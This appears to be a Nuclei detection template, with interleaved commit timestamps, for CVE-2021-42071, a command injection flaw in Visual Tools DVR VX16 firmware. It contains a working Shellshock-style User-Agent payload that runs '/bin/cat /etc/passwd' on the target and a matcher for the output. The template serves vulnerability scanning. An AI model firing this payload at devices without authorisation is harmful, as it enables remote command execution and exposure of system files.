2022-04-07 13:53:15 +00:00
id : CVE-2021-42071
2021-07-22 23:47:29 +00:00
info :
2022-04-15 16:39:44 +00:00
name : Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
2021-07-22 23:47:29 +00:00
author : gy741
severity : critical
2022-04-07 13:53:15 +00:00
description : Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
2021-08-18 11:37:49 +00:00
reference :
2021-07-22 23:47:29 +00:00
- https://www.exploit-db.com/exploits/50098
2022-04-07 13:53:15 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-42071
2022-05-17 09:18:12 +00:00
- https://visual-tools.com/
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-04-07 13:53:15 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-04-07 13:53:15 +00:00
cve-id : CVE-2021-42071
2022-05-17 09:18:12 +00:00
cwe-id : CWE-78
2024-01-14 13:49:27 +00:00
epss-score : 0.95674
2024-03-23 09:28:19 +00:00
epss-percentile : 0.99369
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : visual-tools
product : dvr_vx16_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools
2022-04-15 16:39:44 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-22 23:47:29 +00:00
- raw :
- |
GET /cgi-bin/slogin/login.py HTTP/1.1
Host : {{Hostname}}
Accept : */*
User-Agent : () { :; }; echo ; echo ; /bin/cat /etc/passwd
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-22 23:47:29 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100bd2e97c97843a43e115f22e2faa7e7cb49e1dadbe6d5bd11c2060d05d7ab4bd3022074a123a344cd4834ec334903e33989e076947a8189573657444c9668211d597f:922c64590222798bb761d5b6d8e72950